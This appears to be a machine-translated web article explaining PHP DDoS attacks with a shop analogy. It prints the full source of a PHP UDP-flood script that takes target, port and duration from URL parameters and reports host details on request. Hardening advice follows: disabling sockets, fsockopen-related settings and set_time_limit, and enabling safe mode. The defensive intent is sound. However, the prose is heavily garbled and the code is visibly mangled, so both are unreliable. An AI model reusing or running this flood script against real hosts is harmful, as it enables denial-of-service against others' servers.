A deep understanding of what DDoS is, from an analogy.
What will they do if a bunch of bullies try to keep a rival shop in the opposite direction from operating normally? (Just for example, do not imitate) the bully disguised as an ordinary customer has been crowded in the opponent's shop, relying on not to go, the real shopper is unable to enter, or always and the salesperson desultorily, so that staff can not normal service customers, but also for the shop operators to provide false information, Shop up and down busy into a group, but found all is a empty, finally ran the real big customer, the loss of heavy. In addition, bullies sometimes do things that are hard to accomplish by themselves and need to be called together. Well, the DOS and DDoS attacks in the cyber security world follow these ideas.
This article mainly introduces the solution of the DDoS Attack of PHP, the example analyzes the principle of the DDoS attack program and the targeted solution, is very practical skills, the need for friends can refer to the next
First look at the source code, the following:
<?php Set_time_limit (999999); $host = $_get[' host ']; $port = $_get[' Port ']; $exec _time = $_get[' time '); $Sendlen = 65535; $packets = 0; Ignore_user_abort (True); if (StrLen ($host) ==0 or StrLen ($port) ==0 or StrLen ($exec _time) ==0) {if (StrLen ($_get[' rat ']) <>0) { echo $_get[' rat '].$_server["Http_host"]. "|". gethostbyname ($_server[' server_name '). "|". Php_uname (). "|". $_server[' server_software '].$_get[' rat '; Exit } echo "Parameters can not be empty!"; Exit } for ($i =0; $i < $Sendlen; $i + +) {$out. = "A"; } $max _time = time () + $exec _time; while (1) {$packets + +; if (Time () > $max _time) {break; } $fp = Fsockopen ("udp://$host", $port, $errno, $ERRSTR, 5); if ($fp) {fwrite ($fp, $out); Fclose ($FP); }} echo "Send Host: $host: $port <br><br>"; echo "Send Flow: $packets * ($Sendlen/1024=". Round ($Sendlen/1024, 2). ") kb/1024 =". Round$packets * $Sendlen/1024/1024, 2). "Mb<br><br>"; echo "Send rate:". Round ($packets/$exec _time, 2). "PACKS/S;". Round ($packets/$exec _time* $Sendlen/1024/1024, 2). "MB/s";?>
The key code is as follows:
$fp = Fsockopen ("udp://$ip", $rand, $errno, $ERRSTR, 5);The method is very simple, send UDP packets to the target host, and in addition to define infinite dead loop, it will form a large pressure.
This pressure is for the server to execute this script, because it first on its own network width, CPU and other resources caused a lot of occupation, if you want to use this script to the target site pressure, need to execute the script on multiple servers, DDoS, since it is used Fsockopen request external, it will not let him request .
php.ini , the code is as follows:
Allow_url_fopen = Off
If so he can still contract, the code is as follows:
Extension=php_sockets.dll
Change into
; Extension=php_sockets.dll
Restart Apache, IIS, and NGINX so you can prevent a PHP DDoS contract.
Another netizen said, let the script does not allow setting to not timeout is very simple:
1. Disable the Set_time_limit function
2. Enable PHP security Mode (Safe_mode=on).
Disabling the socket function can disable the socket module directly or disable the Fsockopen function, it is recommended that because the socket is often used to send back the password, it is recommended to turn on the direct-on security mode, but in this case, the script expires every 30 seconds, it is estimated that no "Hacker" lonely to every 30 seconds to point to start DDoS.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
